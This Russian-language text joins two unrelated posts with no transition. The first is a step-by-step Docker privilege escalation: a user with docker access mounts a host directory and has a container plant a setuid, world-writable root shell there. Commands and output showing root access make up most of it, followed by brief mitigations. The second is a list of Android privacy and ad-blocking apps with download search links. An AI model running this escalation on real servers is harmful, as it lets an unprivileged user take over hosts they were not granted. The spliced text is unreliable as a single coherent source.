На самом деле это не дыра в безопасности. Т.е. это заложено в архитектуре.

И так. Например, ты разработчик, которому админ(чтобы ты отстал), разрешил на каком-то серваке пускать контейнеры docker. Т.е. ты можешь делать docker run/pull/push без sudo. Ок.

Пулим образ:

$ docker pull monsantoco/min-jessie

Using default tag: latest

latest: Pulling from monsantoco/min-jessie

a3ed95caeb02: Pull complete

d9f5175a7629: Pull complete

Digest: sha256:d8b651e894b8b66def8aaa268b5e8ec2c4f9480e3f2b7b2ec664203e610d6d96

Status: Downloaded newer image for monsantoco/min-jessie:latest

И пускаем:

$ mkdir /var/tmp/sh

$ docker run -d -v /var/tmp/sh:/stuff -t monsantoco/min-jessie /bin/sh -c 'cp /bin/sh /stuff && chown root:root /stuff/sh && chmod 777 /stuff/sh && chmod ao+s /stuff/sh && while true; do echo OK; sleep 5; done'

$ ls /var/tmp/sh/ -l

итого 124

-rwsrwsrwx 1 root root 125400 июн 7 11:02 sh

$ /var/tmp/sh/sh

# whoami

root

#

Вот так мы получили суидный шелл за пределами контейнера.

Как решить?

* Запереть юзера в хомяке с noexec,nosuid

* Все tmp каталоги монтировать в память и с noexec,nosuid

* Настроить selinux

ЗЫ:

$ docker --version

Docker version 1.10.3, build 20f81dd

$ lsb_release -a

No LSB modules are available.

Distributor ID: Ubuntu

Description: Ubuntu 16.04 LTS

Release: 16.04

Codename: xenial

Прямых ссылок на скачивание пикабу оставить не дал, поэтому я оставил ссылки гугл-поиска с ключевыми словами, все приложения мной качались с Trashbox и проблем не возникало, но если кого-то Trashbox не устраивает, то в сети, уверен, найдётся альтернатива.

Для начала Tor (https://ru.wikipedia.org/wiki/Tor) для десктопа (на всякий случай если кто не в курсе) - https://www.torproject.org/projects/torbrowser.html.en

Orbot - тот же Tor, только для смартфонов (root обязателен) - http://4pda.ru/forum/index.php?showtopic=211665

скачать можно тут - https://www.google.com/webhp?hl=en#hl=en&q=Trashbox+orbot

В интерфейсе есть кнока "приложения" - запускает все приложения через Tor. В комплекте может устанавливаться браузер Orfox на основе FireFox-а.

Любые приложения (игры и т.п.) перед установкой всегда требуют целый список разрешейний (от местоположения до IMEI телефона), часто это доходит до абсурда, приложение AppOpps поможет это контролировать

AppOpps - контроль разрешений для приложений (root обязателен) - http://4pda.ru/forum/index.php?showtopic=520989

Скачать можно тут - https://www.google.com/webhp?hl=en#hl=en&q=Trashbox+AppOpps

Если вы устанавливаете какие-либо приложения через GooglePlay, вы обязаны подтвердить разрешения перед установкой, иначе установка невозможна. Если вы скачиваете приложение со стороннего ресурса, то у вас есть возможность выбора некоторых разрешений, а далее в дело вступает AppOpps.

AddAway - режет рекламу в приложениях (root обязателен)  -  http://4pda.ru/forum/index.php?showtopic=275091

скачать можно тут - https://www.google.com/webhp?hl=en#hl=en&q=Trashbox+AdAway

п.с  некоторые антивирусы способны принять AddAway за вредоносное ПО, так что на ваше усмотрение. С просторов GooglePlay это приложение было удалено. Режет рекламу - режет доход. На F-droid доступно, про F-droid ниже...

F-Droid - репозиторий открытого и бесплатного ПО - http://4pda.ru/forum/index.php?showtopic=310378

Если телефон на гарантии, не рекомендую получать root-права, возможны проблемы с гарантийным обслуживанием.